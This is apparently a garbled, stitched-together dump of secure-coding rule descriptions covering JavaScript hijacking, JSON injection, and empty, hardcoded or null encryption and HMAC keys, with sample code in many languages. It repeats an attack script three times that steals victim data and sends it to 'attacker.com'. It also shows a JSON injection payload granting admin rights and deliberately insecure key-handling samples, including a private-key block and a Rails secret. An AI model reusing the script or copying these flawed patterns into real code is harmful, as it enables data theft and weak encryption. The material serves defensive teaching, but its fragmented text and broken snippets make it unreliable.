<script>
tag and is therefore vulnerable to JavaScript hijacking [1]. By default, the framework use the POST method to submit requests, which makes it difficult to generate a request from a malicious <script>
tag (since <script>
tags only generate GET requests). However, Microsoft AJAX.NET does provide mechanisms for using GET requests. In fact, many experts encourage programmers to use GET requests in order to leverage browser caching and improve performance.
var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);
GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]
<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>
<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>
<script>
tag and is therefore vulnerable to JavaScript hijacking [1]. By default, the framework uses the POST method to submit requests, which makes it difficult to generate a request from a malicious <script>
tag (since <script>
tags only generate GET requests). However, GWT does provide mechanisms for using GET requests. In fact, many experts encourage programmers to use GET requests in order to leverage browser caching and improve performance.
var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);
GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]
<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>
<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>
var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);
GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]
<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>
<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>
username
and password
to the JSON file located at C:\user_info.json
:
...
StringBuilder sb = new StringBuilder();
StringWriter sw = new StringWriter(sb);
using (JsonWriter writer = new JsonTextWriter(sw))
{
writer.Formatting = Formatting.Indented;
writer.WriteStartObject();
writer.WritePropertyName("role");
writer.WriteRawValue("\"default\"");
writer.WritePropertyName("username");
writer.WriteRawValue("\"" + username + "\"");
writer.WritePropertyName("password");
writer.WriteRawValue("\"" + password + "\"");
writer.WriteEndObject();
}
File.WriteAllText(@"C:\user_info.json", sb.ToString());
JsonWriter.WriteRawValue()
, the untrusted data in username
and password
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
with password Evil123!
were to append ","role":"admin
to her username when entering it at the prompt that sets the value of the username
variable, the resulting JSON saved to C:\user_info.json
would be:
{
"role":"default",
"username":"mallory",
"role":"admin",
"password":"Evil123!"
}
Dictionary
object with JsonConvert.DeserializeObject()
as so:
String jsonString = File.ReadAllText(@"C:\user_info.json");
Dictionary<string, string> userInfo = JsonConvert.DeserializeObject<Dictionary<string, strin>>(jsonString);
username
, password
, and role
keys in the Dictionary
object would be mallory
, Evil123!
, and admin
respectively. Without further verification that the deserialized JSON values are valid, the application will incorrectly assign user mallory
"admin" privileges.username
and password
to the JSON file located at ~/user_info.json
:
...
func someHandler(w http.ResponseWriter, r *http.Request){
r.parseForm()
username := r.FormValue("username")
password := r.FormValue("password")
...
jsonString := `{
"username":"` + username + `",
"role":"default"
"password":"` + password + `",
}`
...
f, err := os.Create("~/user_info.json")
defer f.Close()
jsonEncoder := json.NewEncoder(f)
jsonEncoder.Encode(jsonString)
}
username
and password
is not validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, which can possibly change the serialized JSON structure. In this example, if the non-privileged user mallory
with password Evil123!
appended ","role":"admin
when she entered her username, the resulting JSON saved to ~/user_info.json
would be:
{
"username":"mallory",
"role":"default",
"password":"Evil123!",
"role":"admin"
}
mallory
"admin" privileges.username
and password
to the JSON file located at ~/user_info.json
:
...
JsonFactory jfactory = new JsonFactory();
JsonGenerator jGenerator = jfactory.createJsonGenerator(new File("~/user_info.json"), JsonEncoding.UTF8);
jGenerator.writeStartObject();
jGenerator.writeFieldName("username");
jGenerator.writeRawValue("\"" + username + "\"");
jGenerator.writeFieldName("password");
jGenerator.writeRawValue("\"" + password + "\"");
jGenerator.writeFieldName("role");
jGenerator.writeRawValue("\"default\"");
jGenerator.writeEndObject();
jGenerator.close();
JsonGenerator.writeRawValue()
, the untrusted data in username
and password
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
with password Evil123!
were to append ","role":"admin
to her username when entering it at the prompt that sets the value of the username
variable, the resulting JSON saved to ~/user_info.json
would be:
{
"username":"mallory",
"role":"admin",
"password":"Evil123!",
"role":"default"
}
HashMap
object with Jackson's JsonParser
as so:
JsonParser jParser = jfactory.createJsonParser(new File("~/user_info.json"));
while (jParser.nextToken() != JsonToken.END_OBJECT) {
String fieldname = jParser.getCurrentName();
if ("username".equals(fieldname)) {
jParser.nextToken();
userInfo.put(fieldname, jParser.getText());
}
if ("password".equals(fieldname)) {
jParser.nextToken();
userInfo.put(fieldname, jParser.getText());
}
if ("role".equals(fieldname)) {
jParser.nextToken();
userInfo.put(fieldname, jParser.getText());
}
if (userInfo.size() == 3)
break;
}
jParser.close();
username
, password
, and role
keys in the HashMap
object would be mallory
, Evil123!
, and admin
respectively. Without further verification that the deserialized JSON values are valid, the application will incorrectly assign user mallory
"admin" privileges.
var str = document.URL;
var url_check = str.indexOf('name=');
var name = null;
if (url_check > -1) {
name = decodeURIComponent(str.substring((url_check+5), str.length));
}
$(document).ready(function(){
if (name !== null){
var obj = jQuery.parseJSON('{"role": "user", "name" : "' + name + '"}');
...
}
...
});
name
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
were to append ","role":"admin
to the name parameter in the URL, the JSON would become:
{
"role":"user",
"username":"mallory",
"role":"admin"
}
jQuery.parseJSON()
and set to a plain object, meaning that obj.role
would now return "admin" instead of "user"_usernameField
and _passwordField
:
...
NSString * const jsonString = [NSString stringWithFormat: @"{\"username\":\"%@\",\"password\":\"%@\",\"role\":\"default\"}" _usernameField.text, _passwordField.text];
NSString.stringWithFormat:
, the untrusted data in _usernameField
and _passwordField
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
with password Evil123!
were to append ","role":"admin
to her username when entering it into the _usernameField
field, the resulting JSON would be:
{
"username":"mallory",
"role":"admin",
"password":"Evil123!",
"role":"default"
}
NSDictionary
object with NSJSONSerialization.JSONObjectWithData:
as so:
NSError *error;
NSDictionary *jsonData = [NSJSONSerialization JSONObjectWithData:[jsonString dataUsingEncoding:NSUTF8StringEncoding] options:NSJSONReadingAllowFragments error:&error];
username
, password
, and role
in the NSDictionary
object would be mallory
, Evil123!
, and admin
respectively. Without further verification that the deserialized JSON values are valid, the application will incorrectly assign user mallory
"admin" privileges.
import json
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
url = 'https://www.example.com/some_path?name=some_value'
parsed_url = urlparse(url)
untrusted_values = parse_qs(parsed_url.query)['name'][0]
with open('data.json', 'r') as json_File:
data = json.load(json_File)
data['name']= untrusted_values
with open('data.json', 'w') as json_File:
json.dump(data, json_File)
...
name
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
were to append ","role":"admin
to the name parameter in the URL, the JSON would become:
{
"role":"user",
"username":"mallory",
"role":"admin"
}
usernameField
and passwordField
:
...
let jsonString : String = "{\"username\":\"\(usernameField.text)\",\"password\":\"\(passwordField.text)\",\"role\":\"default\"}"
usernameField
and passwordField
will not be validated to escape JSON-related special characters. This allows a user to arbitrarily insert JSON keys, possibly changing the structure of the serialized JSON. In this example, if the non-privileged user mallory
with password Evil123!
were to append ","role":"admin
to her username when entering it into the usernameField
field, the resulting JSON would be:
{
"username":"mallory",
"role":"admin",
"password":"Evil123!",
"role":"default"
}
NSDictionary
object with NSJSONSerialization.JSONObjectWithData:
as so:
var error: NSError?
var jsonData : NSDictionary = NSJSONSerialization.JSONObjectWithData(jsonString.dataUsingEncoding(NSUTF8StringEncoding), options: NSJSONReadingOptions.MutableContainers, error: &error) as NSDictionary
username
, password
, and role
in the NSDictionary
object would be mallory
, Evil123!
, and admin
respectively. Without further verification that the deserialized JSON values are valid, the application will incorrectly assign user mallory
"admin" privileges.
...
encryptionKey = "".
...
...
var encryptionKey:String = "";
var key:ByteArray = Hex.toArray(Hex.fromString(encryptionKey));
...
var aes.ICipher = Crypto.getCipher("aes-cbc", key, padding);
...
...
char encryptionKey[] = "";
...
...
<cfset encryptionKey = "" />
<cfset encryptedMsg = encrypt(msg, encryptionKey, 'AES', 'Hex') />
...
...
key := []byte("");
block, err := aes.NewCipher(key)
...
...
private static String encryptionKey = "";
byte[] keyBytes = encryptionKey.getBytes();
SecretKeySpec key = new SecretKeySpec(keyBytes, "AES");
Cipher encryptCipher = Cipher.getInstance("AES");
encryptCipher.init(Cipher.ENCRYPT_MODE, key);
...
...
var crypto = require('crypto');
var encryptionKey = "";
var algorithm = 'aes-256-ctr';
var cipher = crypto.createCipher(algorithm, encryptionKey);
...
...
CCCrypt(kCCEncrypt,
kCCAlgorithmAES,
kCCOptionPKCS7Padding,
"",
0,
iv,
plaintext,
sizeof(plaintext),
ciphertext,
sizeof(ciphertext),
&numBytesEncrypted);
...
...
$encryption_key = '';
$filter = new Zend_Filter_Encrypt($encryption_key);
$filter->setVector('myIV');
$encrypted = $filter->filter('text_to_be_encrypted');
print $encrypted;
...
...
from Crypto.Ciphers import AES
cipher = AES.new("", AES.MODE_CFB, iv)
msg = iv + cipher.encrypt(b'Attack at dawn')
...
require 'openssl'
...
dk = OpenSSL::PKCS5::pbkdf2_hmac_sha1(password, salt, 100000, 0) # returns an empty string
...
...
CCCrypt(UInt32(kCCEncrypt),
UInt32(kCCAlgorithmAES128),
UInt32(kCCOptionPKCS7Padding),
"",
0,
iv,
plaintext,
plaintext.length,
ciphertext.mutableBytes,
ciphertext.length,
&numBytesEncrypted)
...
...
Dim encryptionKey As String
Set encryptionKey = ""
Dim AES As New System.Security.Cryptography.RijndaelManaged
On Error GoTo ErrorHandler
AES.Key = System.Text.Encoding.ASCII.GetBytes(encryptionKey)
...
Exit Sub
...
...
DATA: lo_hmac TYPE Ref To cl_abap_hmac,
Input_string type string.
CALL METHOD cl_abap_hmac=>get_instance
EXPORTING
if_algorithm = 'SHA3'
if_key = space
RECEIVING
ro_object = lo_hmac.
" update HMAC with input
lo_hmac->update( if_data = input_string ).
" finalise hmac
lo_digest->final( ).
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
using (HMAC hmac = HMAC.Create("HMACSHA512"))
{
string hmacKey = "";
byte[] keyBytes = Encoding.ASCII.GetBytes(hmacKey);
hmac.Key = keyBytes;
...
}
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
import "crypto/hmac"
...
hmac.New(md5.New, []byte(""))
...
Example 1
might run successfully, but anyone who has access to it can determine that it uses an empty HMAC key. After the program ships, there is no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
private static String hmacKey = "";
byte[] keyBytes = hmacKey.getBytes();
...
SecretKeySpec key = new SecretKeySpec(keyBytes, "SHA1");
Mac hmac = Mac.getInstance("HmacSHA1");
hmac.init(key);
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
let hmacKey = "";
let hmac = crypto.createHmac("SHA256", hmacKey);
hmac.update(data);
...
Example 1
might run successfully, but anyone with access to it might figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function.
...
CCHmac(kCCHmacAlgSHA256, "", 0, plaintext, plaintextLen, &output);
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
import hmac
...
mac = hmac.new("", plaintext).hexdigest()
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
digest = OpenSSL::HMAC.digest('sha256', '', data)
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
CCHmac(UInt32(kCCHmacAlgSHA256), "", 0, plaintext, plaintextLen, &output)
...
Example 1
may run successfully, but anyone who has access to it will be able to figure out that it uses an empty HMAC key. After the program ships, there is likely no way to change the empty HMAC key unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function. Also, the code in Example 1
is vulnerable to forgery and key recovery attacks.
...
Rfc2898DeriveBytes rdb = new Rfc2898DeriveBytes("", salt,100000);
...
...
var encryptor = new StrongPasswordEncryptor();
var encryptedPassword = encryptor.encryptPassword("");
...
const pbkdfPassword = "";
crypto.pbkdf2(
pbkdfPassword,
salt,
numIterations,
keyLen,
hashAlg,
function (err, derivedKey) { ... }
)
...
CCKeyDerivationPBKDF(kCCPBKDF2,
"",
0,
salt,
saltLen
kCCPRFHmacAlgSHA256,
100000,
derivedKey,
derivedKeyLen);
...
...
CCKeyDerivationPBKDF(kCCPBKDF2,
password,
0,
salt,
saltLen
kCCPRFHmacAlgSHA256,
100000,
derivedKey,
derivedKeyLen);
...
password
contains a strong, appropriately managed password value, passing its length as zero will result in an empty, null
, or otherwise unexpected weak password value.
...
$zip = new ZipArchive();
$zip->open("test.zip", ZipArchive::CREATE);
$zip->setEncryptionIndex(0, ZipArchive::EM_AES_256, "");
...
from hashlib import pbkdf2_hmac
...
dk = pbkdf2_hmac('sha256', '', salt, 100000)
...
...
key = OpenSSL::PKCS5::pbkdf2_hmac('', salt, 100000, 256, 'SHA256')
...
...
CCKeyDerivationPBKDF(CCPBKDFAlgorithm(kCCPBKDF2),
"",
0,
salt,
saltLen,
CCPseudoRandomAlgorithm(kCCPRFHmacAlgSHA256),
100000,
derivedKey,
derivedKeyLen)
...
...
CCKeyDerivationPBKDF(CCPBKDFAlgorithm(kCCPBKDF2),
password,
0,
salt,
saltLen,
CCPseudoRandomAlgorithm(kCCPRFHmacAlgSHA256),
100000,
derivedKey,
derivedKeyLen)
...
password
contains a strong, appropriately managed password value, passing its length as zero will result in an empty, null
, or otherwise unexpected weak password value.
...
encryptionKey = "lakdsljkalkjlksdfkl".
...
...
var encryptionKey:String = "lakdsljkalkjlksdfkl";
var key:ByteArray = Hex.toArray(Hex.fromString(encryptionKey));
...
var aes.ICipher = Crypto.getCipher("aes-cbc", key, padding);
...
...
Blob encKey = Blob.valueOf('YELLOW_SUBMARINE');
Blob encrypted = Crypto.encrypt('AES128', encKey, iv, input);
...
...
using (SymmetricAlgorithm algorithm = SymmetricAlgorithm.Create("AES"))
{
string encryptionKey = "lakdsljkalkjlksdfkl";
byte[] keyBytes = Encoding.ASCII.GetBytes(encryptionKey);
algorithm.Key = keyBytes;
...
}
...
char encryptionKey[] = "lakdsljkalkjlksdfkl";
...
...
<cfset encryptionKey = "lakdsljkalkjlksdfkl" />
<cfset encryptedMsg = encrypt(msg, encryptionKey, 'AES', 'Hex') />
...
...
key := []byte("lakdsljkalkjlksd");
block, err := aes.NewCipher(key)
...
...
private static final String encryptionKey = "lakdsljkalkjlksdfkl";
byte[] keyBytes = encryptionKey.getBytes();
SecretKeySpec key = new SecretKeySpec(keyBytes, "AES");
Cipher encryptCipher = Cipher.getInstance("AES");
encryptCipher.init(Cipher.ENCRYPT_MODE, key);
...
...
var crypto = require('crypto');
var encryptionKey = "lakdsljkalkjlksdfkl";
var algorithm = 'aes-256-ctr';
var cipher = crypto.createCipher(algorithm, encryptionKey);
...
...
{
"username":"scott"
"password":"tiger"
}
...
...
NSString encryptionKey = "lakdsljkalkjlksdfkl";
...
...
$encryption_key = 'hardcoded_encryption_key';
//$filter = new Zend_Filter_Encrypt('hardcoded_encryption_key');
$filter = new Zend_Filter_Encrypt($encryption_key);
$filter->setVector('myIV');
$encrypted = $filter->filter('text_to_be_encrypted');
print $encrypted;
...
...
from Crypto.Ciphers import AES
encryption_key = b'_hardcoded__key_'
cipher = AES.new(encryption_key, AES.MODE_CFB, iv)
msg = iv + cipher.encrypt(b'Attack at dawn')
...
_hardcoded__key_
unless the program is patched. A devious employee with access to this information can use it to compromise data encrypted by the system.
require 'openssl'
...
encryption_key = 'hardcoded_encryption_key'
...
cipher = OpenSSL::Cipher::AES.new(256, 'GCM')
cipher.encrypt
...
cipher.key=encryption_key
...
Example 2: The following code performs AES encryption using a hardcoded encryption key:
...
let encryptionKey = "YELLOW_SUBMARINE"
...
...
CCCrypt(UInt32(kCCEncrypt),
UInt32(kCCAlgorithmAES128),
UInt32(kCCOptionPKCS7Padding),
"YELLOW_SUBMARINE",
16,
iv,
plaintext,
plaintext.length,
ciphertext.mutableBytes,
ciphertext.length,
&numBytesEncrypted)
...
...
-----BEGIN RSA PRIVATE KEY-----
MIICXwIBAAKBgQCtVacMo+w+TFOm0p8MlBWvwXtVRpF28V+o0RNPx5x/1TJTlKEl
...
DiJPJY2LNBQ7jS685mb6650JdvH8uQl6oeJ/aUmq63o2zOw=
-----END RSA PRIVATE KEY-----
...
...
Dim encryptionKey As String
Set encryptionKey = "lakdsljkalkjlksdfkl"
Dim AES As New System.Security.Cryptography.RijndaelManaged
On Error GoTo ErrorHandler
AES.Key = System.Text.Encoding.ASCII.GetBytes(encryptionKey)
...
Exit Sub
...
...
production:
secret_key_base: 0ab25e26286c4fb9f7335947994d83f19861354f19702b7bbb84e85310b287ba3cdc348f1f19c8cdc08a7c6c5ad2c20ad31ecda177d2c74aa2d48ec4a346c40e
...
...
DATA: lo_hmac TYPE Ref To cl_abap_hmac,
Input_string type string.
CALL METHOD cl_abap_hmac=>get_instance
EXPORTING
if_algorithm = 'SHA3'
if_key = 'secret_key'
RECEIVING
ro_object = lo_hmac.
" update HMAC with input
lo_hmac->update( if_data = input_string ).
" finalise hmac
lo_digest->final( ).
...
...
using (HMAC hmac = HMAC.Create("HMACSHA512"))
{
string hmacKey = "lakdsljkalkjlksdfkl";
byte[] keyBytes = Encoding.ASCII.GetBytes(hmacKey);
hmac.Key = keyBytes;
...
}
import "crypto/hmac"
...
hmac.New(sha256.New, []byte("secret"))
...
...
private static String hmacKey = "lakdsljkalkjlksdfkl";
byte[] keyBytes = hmacKey.getBytes();
...
SecretKeySpec key = new SecretKeySpec(keyBytes, "SHA1");
Mac hmac = Mac.getInstance("HmacSHA1");
hmac.init(key);
...
const hmacKey = "a secret";
const hmac = createHmac('sha256', hmacKey);
hmac.update(data);
...
hmacKey
unless the program is patched. A devious employee with access to this information could use it to compromise the HMAC function.
...
CCHmac(kCCHmacAlgSHA256, "secret", 6, plaintext, plaintextLen, &output);
...
import hmac
...
mac = hmac.new("secret", plaintext).hexdigest()
...
...
digest = OpenSSL::HMAC.digest('sha256', 'secret_key', data)
...
...
CCHmac(UInt32(kCCHmacAlgSHA256), "secret", 6, plaintext, plaintextLen, &output)
...
...
Rfc2898DeriveBytes rdb = new Rfc2898DeriveBytes("password", salt,100000);
...
...
var encryptor = new StrongPasswordEncryptor();
var encryptedPassword = encryptor.encryptPassword("password");
...
const pbkdfPassword = "a secret";
crypto.pbkdf2(
pbkdfPassword,
salt,
numIterations,
keyLen,
hashAlg,
function (err, derivedKey) { ... }
)
...
CCKeyDerivationPBKDF(kCCPBKDF2,
"secret",
6,
salt,
saltLen
kCCPRFHmacAlgSHA256,
100000,
derivedKey,
derivedKeyLen);
...
...
$zip = new ZipArchive();
$zip->open("test.zip", ZipArchive::CREATE);
$zip->setEncryptionIndex(0, ZipArchive::EM_AES_256, "hardcodedpassword");
...
from hashlib import pbkdf2_hmac
...
dk = pbkdf2_hmac('sha256', 'password', salt, 100000)
...
...
key = OpenSSL::PKCS5::pbkdf2_hmac('password', salt, 100000, 256, 'SHA256')
...
...
CCKeyDerivationPBKDF(CCPBKDFAlgorithm(kCCPBKDF2),
"secret",
6,
salt,
saltLen,
CCPseudoRandomAlgorithm(kCCPRFHmacAlgSHA256),
100000,
derivedKey,
derivedKeyLen)
...
Null
encryption keys can compromise security in a way that is not easy to remedy.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
var encryptionKey:ByteArray = null;
...
var aes.ICipher = Crypto.getCipher("aes-cbc", encryptionKey, padding);
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.Null
encryption keys can compromise security in a way that is not easy to remedy.null
encryption key. Not only does using a null
encryption key significantly reduce the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
char encryptionKey[] = null;
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the program ships, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, and it is extremely difficult to fix the problem. After the offending code is in production, changing the null
encryption key requires a software patch. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
aes.NewCipher(nil)
...
null
encryption key. Additionally, anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
SecretKeySpec key = null;
....
Cipher encryptCipher = Cipher.getInstance("AES");
encryptCipher.init(Cipher.ENCRYPT_MODE, key);
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
var crypto = require('crypto');
var encryptionKey = null;
var algorithm = 'aes-256-ctr';
var cipher = crypto.createCipher(algorithm, encryptionKey);
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
CCCrypt(kCCEncrypt,
kCCAlgorithmAES,
kCCOptionPKCS7Padding,
nil,
0,
iv,
plaintext,
sizeof(plaintext),
ciphertext,
sizeof(ciphertext),
&numBytesEncrypted);
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
to encryption key variables is a bad idea because it can allow attackers to expose sensitive and encrypted information. Not only does using a null
encryption key significantly reduce the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
.
...
$encryption_key = NULL;
$filter = new Zend_Filter_Encrypt($encryption_key);
$filter->setVector('myIV');
$encrypted = $filter->filter('text_to_be_encrypted');
print $encrypted;
...
null
encryption key, and anyone employing even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the program ships, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.None
to encryption key variables is a bad idea because it can allow attackers to expose sensitive and encrypted information. Not only does using a null
encryption key significantly reduce the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
.
...
from Crypto.Ciphers import AES
cipher = AES.new(None, AES.MODE_CFB, iv)
msg = iv + cipher.encrypt(b'Attack at dawn')
...
null
encryption key, and anyone employing even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the program ships, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key. Not only does using a null
encryption key significantly reduce the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
